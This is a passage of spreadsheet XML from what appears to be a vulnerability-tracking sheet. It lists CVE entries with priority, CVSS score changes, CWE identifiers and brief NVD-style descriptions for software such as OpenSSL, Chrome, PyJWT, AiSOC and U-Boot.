      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>ClaraVerse through 0.3.1 contains server-side request forgery protection bypasses in the download_file and scrape_web agent tools. Authenticated users can bypass hostname validation and IPv6 transition address filtering to make the server request internal services and cloud instance metadata endpoints.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102879</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.3)</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103053</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 9.0.0 before 12.0.0 fail to enforce authentication on the response-action API endpoints when AISOC_DEV_MODE is enabled and AISOC_ACTIONS_SERVICE_TOKEN is empty in the default Docker Compose deployment. Unauthenticated attackers can list response-action integrations, submit and approve actions on behalf of arbitrary principals, and dispatch containment actions using vendor credentials.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103053</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 5.3)</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103057</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 5.1.0 before 12.0.0 contain an authentication bypass vulnerability in the realtime service internal endpoints POST /internal/agent-event and POST /internal/push. Attackers can post arbitrary events with spoofed tenant identifiers to broadcast malicious content over WebSocket and Redis SSE channels or send unauthorized notifications to registered devices.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103057</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35189</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Issue summary: A certificate with many nameRelativeToCRLIssuer CRL
distribution points causes disproportionate heap growth when OpenSSL caches
X.509 extensions.
Impact summary: Receiving a crafted certificate from a malicious peer can lead
to significant memory pressure and possible Denial of Service in clients or
in servers that solicit client certificates.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: A certificate or a set of certificates that fits under the limit for
size of certificates accepted from the peer (~100 KiB) can result in allocation
of several hundred MiB of resident memory on the receiving side
during a normal TLS handshake.  This may be enough to crash the client or
server, if multiple concurrent connections lead to similarly large memory
allocations.
The fix postpones processing of the CRL distribution points extensions in
certificates to the time when the processed value is required for CRL processing.
This avoids keeping large memory allocations for a long time when such
certificates are received.
FIPS impact: no
The affected code is outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35189</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42772</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>openssl, go</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The QUIC stream reassembly algorithm performance deteriorates
progressively as packets are arriving out of order. The worst case has
a quadratic complexity proportional to the number of stream frames kept in
the buffer for the received stream data.
Impact summary: A remote QUIC peer that completes the handshake can create
a connection-scoped CPU pressure and potentially a Denial of Service using
compliant STREAM frames inside the advertised receive window, with low
attacker bandwidth.
CWE: CWE-407: Inefficient Algorithmic Complexity
Description: OpenSSL manages received QUIC stream fragments using a
doubly-linked list. While it optimizes for append operations (at the end of
the list), it falls back to a head-to-tail linear search for any fragment
that does not immediately follow the current `tail`.
By manipulating the sequence of offsets, an attacker can force the server
to perform O(n^2) operations, consuming excessive CPU time for the
QUIC process.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42772</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79417</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-367</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Improper Access Control in ArgusMonitor.sys in Argotronic eGbR ArgusMonitor 7.4.02 and earlier allows local, low-privileged users to bypass device handle access restrictions via a TOCTOU condition in IRP_MJ_CREATE and send a crafted IOCTL 0x9C4024A8 request, causing denial-of-service.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79417</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81869</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-176, CWE-400</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 1.10.0 until 1.33.0, the sdk/trace/span.go attribute truncation path can fail to enforce AttributeValueLengthLimit for string and string-slice attributes containing the valid Unicode replacement character U+FFFD. safeTruncateValidUTF8 treats the valid replacement rune as invalid UTF-8 and returns the original input, while strings.ToValidUTF8 leaves that valid rune unchanged, so a second safeTruncate attempt can also return the oversized value. An attacker who controls span attribute content can retain values longer than the configured limit, increasing per-span memory use and weakening denial-of-service protection in the instrumented process. This issue is fixed in version 1.33.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81869</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95292</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95292</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95300</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95300</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95358</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Mobile in Google Chrome on on Android prior to 154.0.8037.57 allowed a local attacker to bypass system access restrictions into a privileged page via a co-installed app. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95358</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102312</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Omnibox in Google Chrome on on Android prior to 154.0.8037.92 allowed a remote attacker to spoof address bar via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102312</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.8 → 4.3)</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71974</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>U-Boot before 2026.10-rc3 contains an out-of-bounds write vulnerability in read_slotted_partition() that fails to validate image size against partition bounds. Attackers with physical access can supply crafted boot media with oversized headers to write past the load buffer into bootloader memory on devices without Android Verified Boot protection.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71974</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95340</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in PictureInPicture in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95340</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95342</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in V8 in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95342</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95361</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
